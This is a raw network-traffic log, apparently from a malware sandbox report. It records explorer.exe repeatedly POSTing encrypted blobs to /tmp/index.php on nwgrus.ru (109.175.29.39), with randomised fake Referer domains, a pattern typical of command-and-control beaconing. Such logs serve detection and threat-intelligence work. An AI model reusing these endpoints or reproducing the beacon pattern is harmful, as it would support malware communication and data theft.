                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 185
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:47.046350002 CEST185OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 7a 39 f8 f9
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuz9?ZFNk4cp+$,T~_%IacZ,2OKT0y)\Zc!v
                                      Oct 14, 2024 10:02:47.852401018 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:47 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.449747109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:47.861527920 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://axdumywgicw.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 131
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:47.861558914 CEST131OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 32 5d ec 9b
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu2]tTO=1yE1{0K3*Gw
                                      Oct 14, 2024 10:02:48.657077074 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.449748109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:48.666071892 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://drcsfcxotsike.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 215
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:48.666121006 CEST215OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 21 24 cd fb
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu!$4X[5nUrar3["|~%u3.'fE9/naU-osI;5/ckQ0DJ0
                                      Oct 14, 2024 10:02:49.459602118 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:49 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.449749109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:49.471048117 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ljowgttltjb.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 267
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:49.471084118 CEST267OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 57 25 ff b9
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuW%qeh@=4U>}SE6`(tCF]AFEYI!-o17a8*`3c;b]q$IWNDn&U/K
                                      Oct 14, 2024 10:02:50.282727003 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.449750109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:50.291349888 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://qqrvxoxcuflyv.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 329
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:50.291383028 CEST329OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 77 57 a8 e9
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuwWj?YXbdL'P1!4kW{e8#`O5lT<)cq*k5#f*7;38'/vhZM8_59
                                      Oct 14, 2024 10:02:51.089848995 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.449751109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:51.098297119 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://bwkcgbjusdxgntcy.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 236
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:51.098311901 CEST236OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 79 53 c3 92
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuySrOdBxiUa>spb/C&pnlXH^I-I<DP}YY-sO%UIS6IT'4Pb||Py0dve
                                      Oct 14, 2024 10:02:51.895728111 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:51 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.449752109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:51.912986994 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://oivflmljlhkww.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 234
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:51.913023949 CEST234OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 78 2a cb 9f
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vux*^GJ'qY9+FjK_m3&K609sH!2C0/^|YWNypyJx9G>eH@bck0
                                      Oct 14, 2024 10:02:52.777829885 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:52 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.449753109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:52.786597967 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ametqvtlvslgmj.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 193
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:52.786632061 CEST193OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5b 3d a3 e5
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu[=<^sd3S $2XA.NLOaJ;zg2 )H}UzE1+
                                      Oct 14, 2024 10:02:53.594877958 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.449754109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:53.602880955 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://iwhghyqwahgf.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 278
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:53.602914095 CEST278OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 34 25 c2 87
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu4%b:fLK;-P%d;_e{6KK/E[[B]m4:)tE%+!-k]+Z4=dt@:z*`3=
                                      Oct 14, 2024 10:02:54.432265043 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:54 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.449755109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:54.440512896 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://bvmbuxbytsytdm.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 119
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:54.440557003 CEST119OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 44 31 c2 9b
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuD1=r~#K~z%XJ+
                                      Oct 14, 2024 10:02:55.356287003 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:55 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.449756109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:55.364646912 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://nnhkspmojwnsnbxu.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 286
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:55.364675999 CEST286OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 44 20 bb bc
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuD JSobmjK$i$C[s#`OJ88_,!!Kw,^7sRpL-Bum]`fs=%nL-?
                                      Oct 14, 2024 10:02:56.160439014 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
